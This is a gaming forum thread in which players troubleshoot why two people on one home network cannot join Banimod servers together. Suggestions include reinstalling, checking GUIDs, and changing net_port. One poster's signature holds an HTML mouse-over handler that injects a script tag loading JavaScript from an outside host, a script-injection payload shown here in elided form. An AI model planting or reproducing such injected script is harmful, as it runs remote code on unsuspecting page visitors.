Only Banimod Servers :(

Discussion for any banimod bugs or cheats you find...

Moderators: Forum moderators, developers

-[x]- badman

Only Banimod Servers :(

Post by -[x]- badman »

Hey i have a question for all of u.

ok heres my problem/question....

for some reason now on all Banimod myself and Surge cannot play on the same server...

even weirder... if he plays any animod servers all my animod based servers in my favorites will disappear.. and if i try to coonect to it, it will

say Unwanted packets or some weird $hit... thne it will kick him...

and i find this weird because we do not have the same cd key.....

any ideas? :?:
are u ready to die!
Indifference

Post by Indifference »

DK

Never heard of that before. What are the effects on his system? If he has no adverse affects, you may need to reinstall. But that still doesn't answer the question.
I appreciate Medics... They make nice targets in my scope.
Duck

Post by Duck »

yup reinstall would be my first course of action.
My God...its full of stars!!!
Indifference

Post by Indifference »

I wouldn't exactly say it was the first step. First I'd go over every line of script in your config files for the banimod servers. Also, you need to know the effect that these situations are having on his computer. There may be some problem that his system is causing you. You need to go over his scripts as well. if you don't see anything fishy, then reinstall(ain't that a bitch?!) on your computer. If the problem persists, you may need to have him reinstall, as well.

You may also want to start a string in the "Players" forum with a post that asks for help and to post replys to this thread. Include a link to this thread in your post for ease.
I appreciate Medics... They make nice targets in my scope.
Skippy

Post by Skippy »

Hmmm, I don't know if we should offer any help with this problem :?:

Playing against Badman or Surge separately is tough, but together they are invincible (\vsay I've been Owned)....

Maybe this bug or whatever isn't such a bad thing....

j/k guys, I hope you work it out.

Have you tried deleting just your Bani folder in the Wolf../main and then connect to a Bani server. This would most likely correct any possible mpconfig script issues. You say you don't have the same CD Key, but have you checked both of your GUID's?

That's all I can think off. I don't see how a reinstall of the program would impact anything else that a delete of the Banimod folder wouldn't do if you have no problem playing non-Banimod servers.

Good luck, hope to see you both together real soon 8)
TEAMMATE-8163

Post by TEAMMATE-8163 »

i have never heard of this before. but before you waste the 20 mns in reinstalling the game try reinstalling the 1.33 and 1.41 patches. if i ever get a strange problem i just reinstall the patches and 90% of the time the prob is fixed.
-[x]- badman

Post by -[x]- badman »

thanks for the info... will do :)
are u ready to die!
-[x]- badman

Post by -[x]- badman »

K tryed all of the abouve... but it keeps saying (unwanted challenge

responce recieved)?????

any ideas??
are u ready to die!
-[x]- badman

Post by -[x]- badman »

Unless networked computers may not be allowed to play the same servers now??
are u ready to die!
=FF=im2good4u

Post by =FF=im2good4u »

well also i have never heard it before its kina weird :?
Rain

Post by Rain »

The problem seems to be that whatever you're using to share your Internet connection is broken. To try working around it, I'd add '+set net_port 27961' to the command line on ONE of the hosts you're playing from (and keep bumping it up if you have the same problem with another PC.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
GOAT CHEESE

Post by GOAT CHEESE »

-[x]- badman wrote:Unless networked computers may not be allowed to play the same servers now??
little cheese and I both play on the same servers at the same time from two different machines on the same internal network (even with the same public IP address through our router) with no problems. His machine even used to have my CD Key in it.
Try a non-punkbuster server that is Banimod and see if you can get on that. It just smells of punkbuster to me.